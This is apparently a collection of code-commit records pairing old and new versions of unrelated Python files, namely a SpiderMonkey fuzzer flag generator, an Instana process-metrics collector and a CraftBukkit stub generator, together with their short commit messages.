    if shellSupportsFlag(shellPath, '--disable-ion') and chance(.05):
        args.append("--disable-ion")  # --disable-ion landed in bug 789319
    # ARM-specific flags below are only meaningful on ARMv7 hosts.
    # See bug 1026919 comment 60:
    if sps.isARMv7l and \
            shellSupportsFlag(shellPath, '--arm-asm-nop-fill=0') and chance(0.3):
        # It was suggested to focus more on the range between 0 and 1.
        # Reduced the upper limit to 8, see bug 1053996 comment 8.
        asmNopFill = random.randint(1, 8) if chance(0.3) else random.randint(0, 1)
        args.append("--arm-asm-nop-fill=" + str(asmNopFill))  # Landed in bug 1020834
    # See bug 1026919 comment 60:
    if sps.isARMv7l and \
            shellSupportsFlag(shellPath, '--asm-pool-max-offset=1024') and chance(0.3):
        asmPoolMaxOffset = random.randint(5, 1024)
        args.append("--asm-pool-max-offset=" + str(asmPoolMaxOffset))  # Landed in bug 1026919
    if shellSupportsFlag(shellPath, '--no-native-regexp') and chance(.1):
        args.append("--no-native-regexp")  # See bug 976446
    if inspectShell.queryBuildConfiguration(shellPath, 'arm-simulator') and chance(.4):
        args.append('--arm-sim-icache-checks')
    if (shellSupportsFlag(shellPath, '--no-sse3') and shellSupportsFlag(shellPath, '--no-sse4')) and chance(.2):
        # --no-sse3 and --no-sse4 landed in m-c rev 526ba3ace37a.
        if chance(.5):
            args.append("--no-sse3")
        else:
            args.append("--no-sse4")
    if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
        args.append("--no-fpu")  # --no-fpu landed in bug 858022
    if shellSupportsFlag(shellPath, '--no-asmjs') and chance(.5):
        args.append("--no-asmjs")
    # --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
    if shellSupportsFlag(shellPath, '--baseline-eager'):
        if chance(.3):
            args.append('--no-baseline')
        # elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
        elif chance(.6):
            args.append("--baseline-eager")
    # Off-thread (formerly "parallel") Ion compilation: prefer the modern flag
    # spelling, fall back to the legacy one on older shells.
    if shellSupportsFlag(shellPath, '--ion-offthread-compile=off'):
        if chance(.7):
            # Focus on the reproducible cases
            args.append("--ion-offthread-compile=off")
        elif chance(.5) and multiprocessing.cpu_count() > 1 and \
                shellSupportsFlag(shellPath, '--thread-count=1'):
            # Adjusts default number of threads for parallel compilation (turned on by default)
            totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
            args.append('--thread-count=' + str(totalThreads))
        # else:
        #     Default is to have --ion-offthread-compile=on and --thread-count=<some default value>
    elif shellSupportsFlag(shellPath, '--ion-parallel-compile=off'):
        # --ion-parallel-compile=off has gone away as of m-c rev 9ab3b097f304 and f0d67b1ccff9.
        if chance(.7):
            # Focus on the reproducible cases
            args.append("--ion-parallel-compile=off")
        elif chance(.5) and multiprocessing.cpu_count() > 1 and \
                shellSupportsFlag(shellPath, '--thread-count=1'):
            # Adjusts default number of threads for parallel compilation (turned on by default)
            totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
            args.append('--thread-count=' + str(totalThreads))
        # else:
        #     The default is to have --ion-parallel-compile=on and --thread-count=<some default value>
    if ion:
        if chance(.6):
            args.append("--ion-eager")
        if chance(.2):
            args.append("--ion-gvn=off")
        if chance(.2):
            args.append("--ion-licm=off")
        if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
            args.append("--ion-edgecase-analysis=off")
        if chance(.2):
            args.append("--ion-range-analysis=off")
        if chance(.2):
            args.append("--ion-inlining=off")
        if chance(.2):
            args.append("--ion-osr=off")
        if chance(.2):
            args.append("--ion-limit-script-size=off")
        # Backtracking (on by default as of 2015-04-15) and stupid landed in m-c changeset dc4887f61d2e
        # The stupid allocator isn't used by default and devs prefer not to have to fix fuzzbugs
        # if shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
        #     args.append('--ion-regalloc=stupid')
        if shellSupportsFlag(shellPath, '--ion-regalloc=testbed') and chance(.2):
            args.append('--ion-regalloc=testbed')
        if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
            if chance(.3):
                args.append('--ion-check-range-analysis')
        if shellSupportsFlag(shellPath, '--ion-extra-checks'):
            if chance(.3):
                args.append('--ion-extra-checks')
    else:
        args.append("--no-ion")
    # if chance(.05):
    #     args.append("--execute=verifyprebarriers()")
    if chance(.05):
        args.append("-D")  # aka --dump-bytecode
    return args
def basicFlagSets(shellPath):
    '''
    compareJIT uses these combinations of flags (as well as the original set of flags) when run
    through Lithium and autoBisect.

    The three branches target successive shell generations, probed newest
    first: --no-threads, then --ion-offthread-compile=off, then the legacy
    --ion-parallel-compile=off. The first entry of each list is the flag set
    compareJIT uses as its sole baseline.
    '''
    if shellSupportsFlag(shellPath, "--no-threads"):
        basicFlagList = [
            # Parts of this flag permutation come from:
            # https://hg.mozilla.org/mozilla-central/file/e3bf27190360/js/src/tests/lib/tests.py#l12
            ['--fuzzing-safe', '--no-threads', '--ion-eager'],  # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'],
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--baseline-eager'],
            ['--fuzzing-safe', '--no-threads', '--baseline-eager'],
            ['--fuzzing-safe', '--no-threads', '--baseline-eager', '--no-fpu'],
            ['--fuzzing-safe', '--no-threads', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--no-threads', '--no-ion'],  # See bug 1203862
        ]
        if shellSupportsFlag(shellPath, "--non-writable-jitcode"):
            basicFlagList.append(['--fuzzing-safe', '--no-threads', '--ion-eager',
                                  '--non-writable-jitcode', '--ion-check-range-analysis',
                                  '--ion-extra-checks', '--no-sse3'])
        return basicFlagList
    elif shellSupportsFlag(shellPath, "--ion-offthread-compile=off"):
        basicFlagList = [
            # Parts of this flag permutation come from:
            # https://hg.mozilla.org/mozilla-central/file/84bd8d9f4256/js/src/tests/lib/tests.py#l12
            # as well as other interesting flag combinations that have found / may find new bugs.
            ['--fuzzing-safe', '--ion-offthread-compile=off'],  # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-ion'],  # Not in jit_test.py though, see bug 848906 comment 1
            ['--fuzzing-safe', '--ion-offthread-compile=off', '--no-fpu'],
        ]
        if shellSupportsFlag(shellPath, "--thread-count=1"):
            basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'])
        # Range analysis had only started to stabilize around the time when --no-sse3 landed.
        if shellSupportsFlag(shellPath, '--no-sse3'):
            basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off',
                                  '--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
        return basicFlagList
    else:
        basicFlagList = [
            # Parts of this flag permutation come from:
            # https://hg.mozilla.org/mozilla-central/file/10932f3a0ba0/js/src/tests/lib/tests.py#l12
            # as well as other interesting flag combinations that have found / may find new bugs.
            ['--fuzzing-safe', '--ion-parallel-compile=off'],  # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--ion-eager'],  # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager'],
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-ion'],  # See bug 848906 comment 1
            ['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-fpu'],
        ]
        if shellSupportsFlag(shellPath, "--thread-count=1"):
            basicFlagList.append(['--fuzzing-safe', '--ion-eager', '--ion-parallel-compile=off'])
        # Range analysis had only started to stabilize around the time when --no-sse3 landed.
        if shellSupportsFlag(shellPath, '--no-sse3'):
            basicFlagList.append(['--fuzzing-safe', '--ion-parallel-compile=off',
                                  '--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
        return basicFlagList
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
    """Print 100 randomly generated flag sets for the shell given as argv[1]."""
    for _ in range(100):
        # print(...) with a single argument is valid in both Python 2 (a
        # parenthesized print statement) and Python 3 (a function call); the
        # original bare `print` statement is a SyntaxError on Python 3.
        print(' '.join(randomFlagSet(sys.argv[1])))


if __name__ == "__main__":
    testRandomFlags()
|
import threading as t
import instana.log as l
import resource
import os
import gc as gc_
import sys
import instana.agent_const as a
import copy
import time
import json
from types import ModuleType
class Snapshot(object):
    """Static process information (name, interpreter version, rlimits and
    loaded-module versions) gathered for a snapshot payload."""

    name = None
    version = None
    rlimit_core = (0, 0)
    rlimit_cpu = (0, 0)
    rlimit_fsize = (0, 0)
    rlimit_data = (0, 0)
    rlimit_stack = (0, 0)
    rlimit_rss = (0, 0)
    rlimit_nproc = (0, 0)
    rlimit_nofile = (0, 0)
    rlimit_memlock = (0, 0)
    rlimit_as = (0, 0)
    versions = None

    def __init__(self, **kwds):
        # Any subset of the class attributes may be overridden per instance.
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def to_dict(self):
        # Only name/version/versions are serialized; the rlimit fields are not.
        return {
            'name': self.name,
            'version': self.version,
            'versions': self.versions,
        }
class GC(object):
    """Garbage-collector counters (per-generation counts and thresholds)."""

    collect0 = 0
    collect1 = 0
    collect2 = 0
    threshold0 = 0
    threshold1 = 0
    threshold2 = 0

    def __init__(self, **kwds):
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def to_dict(self):
        # Return the live instance attribute dict (note: not a copy).
        return self.__dict__
class Metrics(object):
    """One collection interval's process metrics: rusage fields plus thread
    counts and an optional GC block."""

    ru_utime = .0
    ru_stime = .0
    ru_maxrss = 0
    ru_ixrss = 0
    ru_idrss = 0
    ru_isrss = 0
    ru_minflt = 0
    ru_majflt = 0
    ru_nswap = 0
    ru_inblock = 0
    ru_oublock = 0
    ru_msgsnd = 0
    ru_msgrcv = 0
    ru_nsignals = 0
    ru_nvcs = 0
    ru_nivcsw = 0
    dead_threads = 0
    alive_threads = 0
    daemon_threads = 0
    gc = None

    def __init__(self, **kwds):
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def delta_data(self, delta):
        # Remove every (key, value) pair that is unchanged relative to `delta`,
        # mutating and returning this instance's attribute dict. delta=None
        # means "report everything".
        data = self.__dict__
        if delta is None:
            return data
        unchanged = set(data.items()).intersection(delta.items())
        for key, _ in unchanged:
            del data[key]
        return data

    def to_dict(self):
        # Return the live instance attribute dict (note: not a copy).
        return self.__dict__
class EntityData(object):
    """Payload reported to the agent: pid plus optional snapshot and metrics."""

    pid = 0
    snapshot = None
    metrics = None

    def __init__(self, **kwds):
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def to_dict(self):
        # Return the live instance attribute dict (note: not a copy).
        return self.__dict__
class Meter(object):
    """Background collector that reports metrics to the Instana agent once a
    second, plus a full process snapshot every SNAPSHOT_PERIOD rounds."""

    SNAPSHOT_PERIOD = 600       # process() rounds between full snapshots
    snapshot_countdown = 35     # short initial countdown before first snapshot
    sensor = None
    last_usage = None           # previous getrusage() result, for deltas
    last_collect = None         # previous gc counts, for deltas
    timer = None
    last_metrics = None         # previous metrics dict, for delta reporting

    def __init__(self, sensor):
        self.sensor = sensor
        self.run()

    def run(self):
        # Daemon thread so metric collection never blocks interpreter shutdown.
        self.timer = t.Thread(target=self.collect_and_report)
        self.timer.daemon = True
        self.timer.name = "Instana Metric Collection"
        self.timer.start()

    def collect_and_report(self):
        """Collect and report metrics once a second, forever."""
        while 1:
            self.process()
            time.sleep(1)

    def process(self):
        """Collect one round of metrics and POST them to the agent.

        Normally only fields changed since the previous round are sent; on
        snapshot rounds the full metric set plus a Snapshot is sent.
        """
        if self.sensor.agent.can_send():
            self.snapshot_countdown = self.snapshot_countdown - 1
            ss = None
            cm = self.collect_metrics()
            if self.snapshot_countdown < 1:
                self.snapshot_countdown = self.SNAPSHOT_PERIOD
                ss = self.collect_snapshot()
                # delta against None -> send the full metric payload
                md = copy.deepcopy(cm).delta_data(None)
            else:
                md = copy.deepcopy(cm).delta_data(self.last_metrics)
            ed = EntityData(pid=self.sensor.agent.from_.pid, snapshot=ss, metrics=md)
            url = self.sensor.agent.make_url(a.AGENT_DATA_URL)
            self.sensor.agent.request(url, "POST", ed)
            self.last_metrics = cm.__dict__

    def collect_snapshot(self):
        """Build a Snapshot of static process info; return None on failure."""
        try:
            # Best-effort application name: Flask app, Django project, or the
            # interpreter binary name as a fallback.
            if "FLASK_APP" in os.environ:
                appname = os.environ["FLASK_APP"]
            elif "DJANGO_SETTINGS_MODULE" in os.environ:
                appname = os.environ["DJANGO_SETTINGS_MODULE"].split('.')[0]
            else:
                appname = os.path.basename(sys.executable)
            s = Snapshot(name=appname,
                         version=sys.version,
                         rlimit_core=resource.getrlimit(resource.RLIMIT_CORE),
                         rlimit_cpu=resource.getrlimit(resource.RLIMIT_CPU),
                         rlimit_fsize=resource.getrlimit(resource.RLIMIT_FSIZE),
                         rlimit_data=resource.getrlimit(resource.RLIMIT_DATA),
                         rlimit_stack=resource.getrlimit(resource.RLIMIT_STACK),
                         rlimit_rss=resource.getrlimit(resource.RLIMIT_RSS),
                         rlimit_nproc=resource.getrlimit(resource.RLIMIT_NPROC),
                         rlimit_nofile=resource.getrlimit(resource.RLIMIT_NOFILE),
                         rlimit_memlock=resource.getrlimit(resource.RLIMIT_MEMLOCK),
                         rlimit_as=resource.getrlimit(resource.RLIMIT_AS),
                         versions=self.collect_modules())
            return s
        except Exception as e:
            # The log object expects strings only, so stringify the exception.
            l.error("collect_snapshot: ", str(e))
            return None

    def jsonable(self, value):
        """Coerce a module "version" attribute into a serializable value."""
        if callable(value):
            result = value()
        elif type(value) is ModuleType:
            result = str(value)
        else:
            result = value
        return result

    def collect_modules(self):
        """Return {module_name: version} for loaded modules ("builtin" when no
        version attribute exists); return None on failure."""
        try:
            m = sys.modules
            r = {}
            for k in m:
                # sys.modules can hold None for modules that failed to import.
                if m[k]:
                    d = m[k].__dict__
                    if "version" in d and d["version"]:
                        r[k] = self.jsonable(d["version"])
                    elif "__version__" in d and d["__version__"]:
                        r[k] = self.jsonable(d["__version__"])
                    else:
                        r[k] = "builtin"
            return r
        except Exception as e:
            # Fix: pass str(e), not the exception object — the log object
            # expects strings only (matches collect_snapshot above).
            l.error("collect_modules: ", str(e))
            return None

    def collect_metrics(self):
        """Collect rusage, GC and thread metrics as a Metrics object.

        CPU times, fault/IO/signal/context-switch counters and GC counts are
        deltas against the previous collection; memory fields are absolute.
        """
        u = resource.getrusage(resource.RUSAGE_SELF)
        # Fix: g must exist even when the GC is disabled, otherwise the
        # Metrics(...) call below raised NameError; Metrics.gc defaults to None.
        g = None
        if gc_.isenabled():
            c = list(gc_.get_count())
            th = list(gc_.get_threshold())
            g = GC(collect0=c[0] if not self.last_collect else c[0] - self.last_collect[0],
                   collect1=c[1] if not self.last_collect else c[1] - self.last_collect[1],
                   collect2=c[2] if not self.last_collect else c[2] - self.last_collect[2],
                   threshold0=th[0],
                   threshold1=th[1],
                   threshold2=th[2])
        thr = t.enumerate()
        # Fix: the original took len() of unfiltered boolean lists, so all
        # three counts always equalled the total thread count; count only the
        # threads that actually match each predicate.
        daemon_threads = sum(1 for tr in thr if tr.daemon and tr.is_alive())
        alive_threads = sum(1 for tr in thr if not tr.daemon and tr.is_alive())
        dead_threads = sum(1 for tr in thr if not tr.is_alive())
        m = Metrics(ru_utime=u[0] if not self.last_usage else u[0] - self.last_usage[0],
                    ru_stime=u[1] if not self.last_usage else u[1] - self.last_usage[1],
                    ru_maxrss=u[2],
                    ru_ixrss=u[3],
                    ru_idrss=u[4],
                    ru_isrss=u[5],
                    ru_minflt=u[6] if not self.last_usage else u[6] - self.last_usage[6],
                    ru_majflt=u[7] if not self.last_usage else u[7] - self.last_usage[7],
                    ru_nswap=u[8] if not self.last_usage else u[8] - self.last_usage[8],
                    ru_inblock=u[9] if not self.last_usage else u[9] - self.last_usage[9],
                    ru_oublock=u[10] if not self.last_usage else u[10] - self.last_usage[10],
                    ru_msgsnd=u[11] if not self.last_usage else u[11] - self.last_usage[11],
                    ru_msgrcv=u[12] if not self.last_usage else u[12] - self.last_usage[12],
                    ru_nsignals=u[13] if not self.last_usage else u[13] - self.last_usage[13],
                    ru_nvcs=u[14] if not self.last_usage else u[14] - self.last_usage[14],
                    ru_nivcsw=u[15] if not self.last_usage else u[15] - self.last_usage[15],
                    alive_threads=alive_threads,
                    dead_threads=dead_threads,
                    daemon_threads=daemon_threads,
                    gc=g)
        self.last_usage = u
        if gc_.isenabled():
            self.last_collect = c
        return m
Convert the exception to a string before logging, because the log object expects strings only.
import threading as t
import instana.log as l
import resource
import os
import gc as gc_
import sys
import instana.agent_const as a
import copy
import time
import json
from types import ModuleType
class Snapshot(object):
    """Static process information (name, interpreter version, rlimits and
    loaded-module versions) gathered for a snapshot payload."""

    name = None
    version = None
    rlimit_core = (0, 0)
    rlimit_cpu = (0, 0)
    rlimit_fsize = (0, 0)
    rlimit_data = (0, 0)
    rlimit_stack = (0, 0)
    rlimit_rss = (0, 0)
    rlimit_nproc = (0, 0)
    rlimit_nofile = (0, 0)
    rlimit_memlock = (0, 0)
    rlimit_as = (0, 0)
    versions = None

    def __init__(self, **kwds):
        # Any subset of the class attributes may be overridden per instance.
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def to_dict(self):
        # Only name/version/versions are serialized; the rlimit fields are not.
        return {
            'name': self.name,
            'version': self.version,
            'versions': self.versions,
        }
class GC(object):
    """Garbage-collector counters (per-generation counts and thresholds)."""

    collect0 = 0
    collect1 = 0
    collect2 = 0
    threshold0 = 0
    threshold1 = 0
    threshold2 = 0

    def __init__(self, **kwds):
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def to_dict(self):
        # Return the live instance attribute dict (note: not a copy).
        return self.__dict__
class Metrics(object):
    """One collection interval's process metrics: rusage fields plus thread
    counts and an optional GC block."""

    ru_utime = .0
    ru_stime = .0
    ru_maxrss = 0
    ru_ixrss = 0
    ru_idrss = 0
    ru_isrss = 0
    ru_minflt = 0
    ru_majflt = 0
    ru_nswap = 0
    ru_inblock = 0
    ru_oublock = 0
    ru_msgsnd = 0
    ru_msgrcv = 0
    ru_nsignals = 0
    ru_nvcs = 0
    ru_nivcsw = 0
    dead_threads = 0
    alive_threads = 0
    daemon_threads = 0
    gc = None

    def __init__(self, **kwds):
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def delta_data(self, delta):
        # Remove every (key, value) pair that is unchanged relative to `delta`,
        # mutating and returning this instance's attribute dict. delta=None
        # means "report everything".
        data = self.__dict__
        if delta is None:
            return data
        unchanged = set(data.items()).intersection(delta.items())
        for key, _ in unchanged:
            del data[key]
        return data

    def to_dict(self):
        # Return the live instance attribute dict (note: not a copy).
        return self.__dict__
class EntityData(object):
    """Payload reported to the agent: pid plus optional snapshot and metrics."""

    pid = 0
    snapshot = None
    metrics = None

    def __init__(self, **kwds):
        for attr, value in kwds.items():
            setattr(self, attr, value)

    def to_dict(self):
        # Return the live instance attribute dict (note: not a copy).
        return self.__dict__
class Meter(object):
    """Background collector that reports metrics to the Instana agent once a
    second, plus a full process snapshot every SNAPSHOT_PERIOD rounds."""

    SNAPSHOT_PERIOD = 600       # process() rounds between full snapshots
    snapshot_countdown = 35     # short initial countdown before first snapshot
    sensor = None
    last_usage = None           # previous getrusage() result, for deltas
    last_collect = None         # previous gc counts, for deltas
    timer = None
    last_metrics = None         # previous metrics dict, for delta reporting

    def __init__(self, sensor):
        self.sensor = sensor
        self.run()

    def run(self):
        # Daemon thread so metric collection never blocks interpreter shutdown.
        self.timer = t.Thread(target=self.collect_and_report)
        self.timer.daemon = True
        self.timer.name = "Instana Metric Collection"
        self.timer.start()

    def collect_and_report(self):
        """Collect and report metrics once a second, forever."""
        while 1:
            self.process()
            time.sleep(1)

    def process(self):
        """Collect one round of metrics and POST them to the agent.

        Normally only fields changed since the previous round are sent; on
        snapshot rounds the full metric set plus a Snapshot is sent.
        """
        if self.sensor.agent.can_send():
            self.snapshot_countdown = self.snapshot_countdown - 1
            ss = None
            cm = self.collect_metrics()
            if self.snapshot_countdown < 1:
                self.snapshot_countdown = self.SNAPSHOT_PERIOD
                ss = self.collect_snapshot()
                # delta against None -> send the full metric payload
                md = copy.deepcopy(cm).delta_data(None)
            else:
                md = copy.deepcopy(cm).delta_data(self.last_metrics)
            ed = EntityData(pid=self.sensor.agent.from_.pid, snapshot=ss, metrics=md)
            url = self.sensor.agent.make_url(a.AGENT_DATA_URL)
            self.sensor.agent.request(url, "POST", ed)
            self.last_metrics = cm.__dict__

    def collect_snapshot(self):
        """Build a Snapshot of static process info; return None on failure."""
        try:
            # Best-effort application name: Flask app, Django project, or the
            # interpreter binary name as a fallback.
            if "FLASK_APP" in os.environ:
                appname = os.environ["FLASK_APP"]
            elif "DJANGO_SETTINGS_MODULE" in os.environ:
                appname = os.environ["DJANGO_SETTINGS_MODULE"].split('.')[0]
            else:
                appname = os.path.basename(sys.executable)
            s = Snapshot(name=appname,
                         version=sys.version,
                         rlimit_core=resource.getrlimit(resource.RLIMIT_CORE),
                         rlimit_cpu=resource.getrlimit(resource.RLIMIT_CPU),
                         rlimit_fsize=resource.getrlimit(resource.RLIMIT_FSIZE),
                         rlimit_data=resource.getrlimit(resource.RLIMIT_DATA),
                         rlimit_stack=resource.getrlimit(resource.RLIMIT_STACK),
                         rlimit_rss=resource.getrlimit(resource.RLIMIT_RSS),
                         rlimit_nproc=resource.getrlimit(resource.RLIMIT_NPROC),
                         rlimit_nofile=resource.getrlimit(resource.RLIMIT_NOFILE),
                         rlimit_memlock=resource.getrlimit(resource.RLIMIT_MEMLOCK),
                         rlimit_as=resource.getrlimit(resource.RLIMIT_AS),
                         versions=self.collect_modules())
            return s
        except Exception as e:
            # The log object expects strings only, so stringify the exception.
            l.error("collect_snapshot: ", str(e))
            return None

    def jsonable(self, value):
        """Coerce a module "version" attribute into a serializable value."""
        if callable(value):
            result = value()
        elif type(value) is ModuleType:
            result = str(value)
        else:
            result = value
        return result

    def collect_modules(self):
        """Return {module_name: version} for loaded modules ("builtin" when no
        version attribute exists); return None on failure."""
        try:
            m = sys.modules
            r = {}
            for k in m:
                # sys.modules can hold None for modules that failed to import.
                if m[k]:
                    d = m[k].__dict__
                    if "version" in d and d["version"]:
                        r[k] = self.jsonable(d["version"])
                    elif "__version__" in d and d["__version__"]:
                        r[k] = self.jsonable(d["__version__"])
                    else:
                        r[k] = "builtin"
            return r
        except Exception as e:
            l.error("collect_modules: ", str(e))
            return None

    def collect_metrics(self):
        """Collect rusage, GC and thread metrics as a Metrics object.

        CPU times, fault/IO/signal/context-switch counters and GC counts are
        deltas against the previous collection; memory fields are absolute.
        """
        u = resource.getrusage(resource.RUSAGE_SELF)
        # Fix: g must exist even when the GC is disabled, otherwise the
        # Metrics(...) call below raised NameError; Metrics.gc defaults to None.
        g = None
        if gc_.isenabled():
            c = list(gc_.get_count())
            th = list(gc_.get_threshold())
            g = GC(collect0=c[0] if not self.last_collect else c[0] - self.last_collect[0],
                   collect1=c[1] if not self.last_collect else c[1] - self.last_collect[1],
                   collect2=c[2] if not self.last_collect else c[2] - self.last_collect[2],
                   threshold0=th[0],
                   threshold1=th[1],
                   threshold2=th[2])
        thr = t.enumerate()
        # Fix: the original took len() of unfiltered boolean lists, so all
        # three counts always equalled the total thread count; count only the
        # threads that actually match each predicate.
        daemon_threads = sum(1 for tr in thr if tr.daemon and tr.is_alive())
        alive_threads = sum(1 for tr in thr if not tr.daemon and tr.is_alive())
        dead_threads = sum(1 for tr in thr if not tr.is_alive())
        m = Metrics(ru_utime=u[0] if not self.last_usage else u[0] - self.last_usage[0],
                    ru_stime=u[1] if not self.last_usage else u[1] - self.last_usage[1],
                    ru_maxrss=u[2],
                    ru_ixrss=u[3],
                    ru_idrss=u[4],
                    ru_isrss=u[5],
                    ru_minflt=u[6] if not self.last_usage else u[6] - self.last_usage[6],
                    ru_majflt=u[7] if not self.last_usage else u[7] - self.last_usage[7],
                    ru_nswap=u[8] if not self.last_usage else u[8] - self.last_usage[8],
                    ru_inblock=u[9] if not self.last_usage else u[9] - self.last_usage[9],
                    ru_oublock=u[10] if not self.last_usage else u[10] - self.last_usage[10],
                    ru_msgsnd=u[11] if not self.last_usage else u[11] - self.last_usage[11],
                    ru_msgrcv=u[12] if not self.last_usage else u[12] - self.last_usage[12],
                    ru_nsignals=u[13] if not self.last_usage else u[13] - self.last_usage[13],
                    ru_nvcs=u[14] if not self.last_usage else u[14] - self.last_usage[14],
                    ru_nivcsw=u[15] if not self.last_usage else u[15] - self.last_usage[15],
                    alive_threads=alive_threads,
                    dead_threads=dead_threads,
                    daemon_threads=daemon_threads,
                    gc=g)
        self.last_usage = u
        if gc_.isenabled():
            self.last_collect = c
        return m
|
Skip inline/out-of-line tests for now on Python 3 64-bit. This will need to be fixed eventually, but for now the functionality is tested through other means (we generate and test the wheel we produce).
|
#!/usr/bin/python
import subprocess
import os
CB_CLASS_LIST = "../forge/classes-patched-cb-mcdev"
ALL_CLASS_LIST_SRG = "../jars/cb2mcp.srg"
MC_DEV_EXTRACTED_DIR = "../jars/mc-dev"
OUT_STUB_DIR = "../CraftBukkit/src/main/java/"
def getPatchedByCB():
    """Return the set of class names patched by CraftBukkit.

    Reads CB_CLASS_LIST (one class path per line), stripping whitespace.
    """
    # open() + context manager instead of the Python-2-only file() builtin,
    # which also leaked the file handle.
    with open(CB_CLASS_LIST) as fp:
        return set(line.strip() for line in fp)
def getAll():
    """Return the set of all class names (mc-dev naming) from the srg mapping."""
    classes = []
    # Fix: use the ALL_CLASS_LIST_SRG constant (same path) instead of a
    # duplicated hard-coded string, close the file deterministically, and
    # drop the unused `fields` dict.
    with open(ALL_CLASS_LIST_SRG) as fp:
        for line in fp:
            tokens = line.strip().split(" ")
            # "CL:" records are class mappings; tokens[1] is the class path.
            if tokens[0] == "CL:":
                classes.append(tokens[1])
    return set(classes)
# Generate empty stub .java files for every mc-dev class that CraftBukkit does
# not patch, so the CraftBukkit source tree has something to compile against.
unpatched = getAll() - getPatchedByCB()
for fullClassPath in sorted(list(unpatched)):
    filename = OUT_STUB_DIR + fullClassPath + ".java"
    if os.path.exists(filename):
        #print "File already exists:",filename
        #raise SystemExit
        pass
    if not os.path.exists(os.path.dirname(filename)):
        # org/ dirs need to be created; CB only has net/
        #os.mkdir(os.path.dirname(filename)) # need recursive mkdir
        os.system("mkdir -p " + os.path.dirname(filename)) # warning: injection
    print filename
    f = file(filename, "w")
    package = ".".join(fullClassPath.split("/")[:-1])
    className = fullClassPath.split("/")[-1]
    header = """// Auto-generated methods stubs for %s
package %s;
import org.apache.commons.lang.NotImplementedException;
""" % (className, package)
    f.write(header)
    # javap gives us the (decompiled) signatures of the class.
    lines = subprocess.Popen(["javap", "-classpath", MC_DEV_EXTRACTED_DIR, fullClassPath], stdout=subprocess.PIPE).communicate()[0].split("\n")
    if "Compiled" in lines[0]:
        lines = lines[1:] # skip initial "Compiled from" line, if present
    for line in lines:
        line = line.replace(package + ".", "") # already in package
        line = line.replace(" final ", " ") #
        if "{}" in line:
            # Skip static initializer (always empty)
            continue
        if ")" in line:
            # Methods - add parameter names and body
            parts = line.split("(")
            retn = parts[0]
            args = parts[1].replace(");", "").split(", ")
            if len(args) == 1 and len(args[0]) == 0: args = []
            namedArgs = []
            for i, arg in enumerate(args):
                namedArgs.append("%s par%d" % (arg, i + 1))
            if " abstract " in line:
                # abstract methods can't have a body
                body = ";"
            else:
                body = "{ throw new NotImplementedException(); }"
            line = retn + "(" + ", ".join(namedArgs) + ")" + body
        # NOTE(review): " protecte static" looks like a typo for
        # " protected static" — protected static fields probably never match
        # this branch; confirm against javap output.
        elif line.startswith(" public static") or line.startswith(" protecte static"): # not doing private
            # static fields need initializers
            tokens = line.strip().replace(";","").split(" ")
            name = tokens[-1]
            if "byte" in tokens or "short" in tokens or "int" in tokens:
                default = "0"
            elif "long" in tokens:
                default = "0L"
            elif "float" in tokens:
                default = "0.0f"
            elif "double" in tokens:
                default = "0.0d"
            elif "char" in tokens:
                # NOTE(review): under Python 3 "'\u0000'" is a real NUL
                # character, not the 8-character Java literal; only correct
                # when run under Python 2.
                default = "'\u0000'"
            elif "boolean" in tokens:
                default = "false";
            else:
                default = "null";
            line = line.replace(";", " = %s;" % (default,))
        f.write(line + "\n")
    f.close()
Move to generateStubFromJavap()
#!/usr/bin/python
import subprocess
import os
CB_CLASS_LIST = "../forge/classes-patched-cb-mcdev"
ALL_CLASS_LIST_SRG = "../jars/cb2mcp.srg"
MC_DEV_EXTRACTED_DIR = "../jars/mc-dev"
OUT_STUB_DIR = "../CraftBukkit/src/main/java/"
def getPatchedByCB():
    """Return the set of class names patched by CraftBukkit.

    Reads CB_CLASS_LIST (one class path per line), stripping whitespace.
    """
    # Fix: the original placed its docstring *before* the def, where it is a
    # no-op string expression; moved inside so help()/__doc__ see it.
    # open() + context manager instead of the Python-2-only file() builtin,
    # which also leaked the file handle.
    with open(CB_CLASS_LIST) as fp:
        return set(line.strip() for line in fp)
def getAll():
